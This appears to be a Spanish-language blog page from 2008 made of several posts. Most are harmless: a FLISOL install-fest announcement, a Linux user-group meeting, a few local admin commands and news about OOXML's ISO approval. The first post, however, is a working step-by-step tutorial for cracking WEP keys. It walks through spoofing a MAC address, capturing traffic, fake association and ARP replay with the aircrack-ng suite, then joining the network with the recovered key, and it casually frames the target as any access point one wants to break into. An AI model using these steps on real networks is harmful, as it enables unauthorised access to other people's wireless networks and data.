Crackear (Auditar) claves WEP

Primero que nada quiero aclarar que este pequeño documento les sirve a las personas que tienen las tarjetas ipw3945, ipw2915, ipw2200. Ya que yo tengo una de esas tarjetas y hace tiempo leei un documento que decía lo siguiente .

############
pw2915 uses ipw2200 driver (See this thread
ipw3945 for alpha injection support.) For ipw3945 you
can use the ipwraw-ng driver or see Live
Distros for WifiWay which includes patches for
injection.
#############

Ha si que por esa razón utilice ipwraw-ng para mi debían, pero me es mas sencillo utilizar el wifiway,
hasi que lo explicare utilizando wifiway, ya que viene muy bien soportada mi tarjeta ipw3945.

Lo primero es descargar la distro wifiway, y echarla andar, una ves tengamos jalando lo primero que haremos sera ver que AP astan jalando.

#airodump-ng rtap0

De esta manera veremos que AP están funcionando mejor y en que canal están viajando (chanel), también veremos el BSSID del AP. Después de ver cual es AP que mas nos conviene o de ver cual es el que queremos chingar, tomamos nota del canal (chanel, ch) y del BSSID del módem.
Ahora bien lo primero que aremos sera cambiar la MAC.

#macchanger -m [fakemac] [interface_wifi]
esto seria
#macchanger -m 00:22:33:11:44:66

Después entramos a los archivos bssid y chanel que se encuentran en /sys/class/net/wifi0/device y los editamos.

#nano chanel
Aquí ponemos el ch del AP a auditar, es decir el canal, por lo general son del 1 al 11, con los que mayormente me encontrado son el 1, 6 y el 11

#nano bssid
En este archivo ponemos el BSSID del AP o módem a auditar.

Despues de guardar ambos archivos, empezamos lo interesante. A CAPTURAR.

#airodump-ng -c [chanel] -w [ruta_y_nombre_del_archivo_de_captura] rtap0
esto seria.
#airodump-ng -c 1 -w /home/usuario/captura rtap0

Lo dejamos jalando y en el mismo directorio anterior editamos el archivo rate

#nano rate
aquí le damos el rango de 2, por lo general viene 108 se lo cambiamos y guardamos.

Este paso es si queremos, yo siempre lo hago, el cual es levantar la interfase.

#ifconfig [interfaz] up
seria
#ifconfig wlan0 up ----> en mi caso recordemos que las interfaces varían.

Ahora hay que asociar la tarjeta con el AP.

#aireplay-ng -1 0 -a [BSSID] -h [FAKEMAC] -e [ESSID_AP] [INTERFAZ]
esto seria.
#aireplay -ng -1 0 -a 29:D9:72:4D:15:55 -h 00:22:33:11:44:66 -e INFINITUM445 wifi0

#####este paso lo podemos repetir varias veces hasta asociarnos######

Después de la asociación hacemos.

#aireplay-ng -3 -b [BSSID] -h [FAKEMAC] [INTERFAZ]
esto seria.
#aireplay-ng -3 -b 29:D9:72:4D:15:55 -h 00:22:33:11:44:66 wifi0

En este punto esperamos asta tener bastantes IVs o datos capturados, varia siempre hay veces que tumbas la clave con pocos datos capturados y hay veces que necesitas de amadre, ha si que podemos hacer el siguiente paso varias veces hasta que nos la encuentre.

#aircrack-pwt ARCHIVO_DE_CAPTURA.cap
es decir
#aircrack-pwt /home/usuario/captura.cap
o bien
#cd /home/usuario
aircrack-pwt captura.cap

Si todo sale bien solamente hay que esperar a que aircrack decifre la clave y listo. Nos podemos conectar ha si.

#iwconfig [interfaz] essid [nombre_del_ap] mode managed key [CLAVE_WEP] && dhclient [interfaz]
esto seria.

#iwconfig wifi0 essid INFINITUM445 mode managed key 1029384756 && dhclient wifi0

Nota: Hay que revisar el RXQ para la captura sino tendremos que acercarnos mas al AP.
Nota2: Si no encuentras el archivo donde editas el BSSID, el CHANEL y el RATE puedes hacer un “find” para saber donde están.

#find / -name bssid
#find / -name chanel
#find / -name rate

Deberán estar en la misma carpeta. =)

FLISOL 2008

¿Qué es el FLISOL?

El FLISOL (Festival Latinoamericano de Instalación de Software Libre) es el evento de difusión de Software Libre más grande en Latinoamérica. Se realiza desde el año 2005 y su principal objetivo es promover el uso del software libre, dando a conocer al público en general su filosofía, alcances, avances y desarrollo.

Para tal fin, las diversas comunidades locales de software libre (en cada país, en cada ciudad/localidad), organizan simultáneamente eventos en los que se instala de manera gratuita y totalmente legal, software libre en las computadoras que llevan los asistentes.

Además de la instalación de software libre, se ofrecen charlas.

El FLISOL 2008 se efectuará el día sábado 26 de abril en las instalaciones de la Universidad Autónoma de La Laguna -UAL-.

Las pláticas se celebrarán en el Auditorio de la Universidad y el Taller de Instalación en el CIP. (checar imagen)



El programa del evento iniciara con las siguientes pláticas:

Propuestas:
10:00 "Introducción al Software Libre".- por José Antonio Martínez Torres (toNo) 11:00 "Demostración práctica de GNU/Linux".- por Guillermo Valdez Lozano (guivaloz)

Para continuar al término de estas en el CIP con el Taller de instalación.

¿Quién organiza el evento?

La Comunidad de Software Libre en Latinoamérica, en el caso particular de La Laguna lo hace el Grupo de Usuarios de GNU/Linux de La Laguna -GULAG- conformado por personas de diversa índole, con el apoyo de otras entidades, principalmente educativas, y algunos patrocinadores del evento.

¿A quién esta dirigido el evento?

El evento está dirigido a todo público: estudiantes, académicos, trabajadores, entusiastas y aun personas que no poseen mucho conocimiento informático.

Si posees o no conocimientos e intereses en informática, licencias, derecho de autor/copyright y demás áreas de la ciencia y la tecnología, déjate tentar, asiste y participa del evento. Nuestro objetivo es compartir conocimientos y ansias de libertad.

¿Cuánto cuesta participar el evento?

La asistencia al evento es totalmente libre y gratuita.

¿Qué beneficios obtengo al asistir?

Tendrás la oportunidad de instalar software libre en tu computadora, apreciar qué es una real y segura alternativa a otros modelos de desarrollo y distribución de software, informarte sobre la filosofía, cultura y organización alrededor del mismo.

Tal vez encuentres una alternativa/solución en software libre para ti, tu empresa, colegio, universidad e, incluso, para tu gobierno. Podrás aclarar tus dudas acerca de los temas relacionados y quizás encuentres en el software libre, una alternativa de investigación, empleo y desarrollo tecnológico.

¿Qué necesito llevar para la instalación?

Tu equipo de computo, ya sea desktop o laptop, recomendamos que antes hagas una copia de seguridad de tu información importante -no nos hacemos responsables de la pérdida de información- y defragmentes tu disco duro.

Es importante para los organizadores conocer cuántos equipos se llevaran al evento, por ese motivo te solicitamos que confirmes tu participación vía correo electrónico a las siguientes direcciones:

flisol@gulag.org.mx

En la sede tendremos disponibles las distribuciones Debian, Ubuntu, Fedora, Mandriva, Slackware, si deseas alguna distribución en especial favor de traerla contigo.

Lleva cd's o dvd's vírgenes para que te lleves a tu casa los discos de la distribución que se te haya instalado.

¡Deseos de aprender!

Quiero ayudar ¿qué puedo hacer?

Hay varias opciones para colaborar, contacta con nuestro coordinador local, y ofrece tu apoyo en alguno de estos puntos:

* Difusión
* Patrocinio
* Como Instalador

Coordinador: César Eduardo Espino Quirarte ---> RIVE
mail de contacto: cespinoq at gmail.com
¡Gracias por el interes y esperamos verlos en el FLISOL!

find, netstat, ps, nmap

Find SUID y SGID.
#find / -type d \( -perm -g+w -o -perm -o+w \) -exec ls -lad {} \;

netstat.
#netstat -luntp

ps.
#ps -ef

nmap.
# nmap -sV localhost

Reactivando proyecto kernel panic

Aquí dejando sabes que el proyecto kernel panic esta activo y esperamos que siga así por bastante tiempo, este proyecto tubo como inicio la idea principal de hacer publicaciones única y especial mente sobre seguridad informática el autor de este proyecto GNDX tiene abierto a sugerencias y publicaciones exteriores de seguridad.

KERNELPANIC.ORG.MX

Décima novena reunión GULAG.

El día de ayer sábado 12 de abril del 2008 el Grupo de Usuarios de Gnu/Linux de La Laguna celebraremos la décima novena reunión del grupo en el auditorio de la Universidad Autónoma de La Laguna -UAL- a partir de las 18:00 con el siguiente programa:


* Coordinación FLISOL.- César Espino -RIVE-
* Hacer de GULAG una ONG.- Guillermo Valdez -guivaloz-, Leonardo Ibarra -leoneo-
* "Desarrollo Seguro en Aplicaciones Web".- Jesús Gómez.

Pueden ver unas fotos qui en el blog de gndx =)

Escritorio 3d en pantalla tactil. linux

En lo personal se ve genial algun dia lo tendre asi .

victoria para Microsoft en ISO

Ya es oficial; el formato OOXML de Microsoft para el paquete ofimático Microsoft Office 2007 ha obtenido el número necesario de votos en el Comité Técnico de ISO. Para ser aprobado, cualquier formato propuesto requiere una votación del mínimo de 2 terceras partes de miembros nacionales, a la vez que no más de una cuarta parte puede votar en contra.

ISO ha publicado los resultados de la votación, que indican que el 75% de los 41 delegados votaron a favor en tanto que el 14% votó en contra. Con ello, OOXML se convierte en un estándar internacional con el nombre oficial ISO/IEC DIS 29500.

En septiembre pasado, OOXML fue rechazado durante una sesión de fast track, en que ISO recibió 3500 comentarios para la propuesta y solicitud de Microsoft.

Los miembros nacionales tienen ahora 60 días para apelar a la resolución, al cabo de los cuales el formato OOXML será oficialmente publicado como estándar ISO.

Microsoft expresó gran satisfacción con la certificación ISO de su formato para documentos. El resultado de la votación en ISO concede a Microsoft un importante argumento para convencer a usuarios escépticos de que Office 2007 se basa en estándares abiertos al igual que su competidor de código abierto OpenOffice, con su formato ODF, que ya ha sido certificado por ISO.

Fuente: Cnet.

SOLO TENGO UNA PREGUNTA ¿Que chingados paso? =(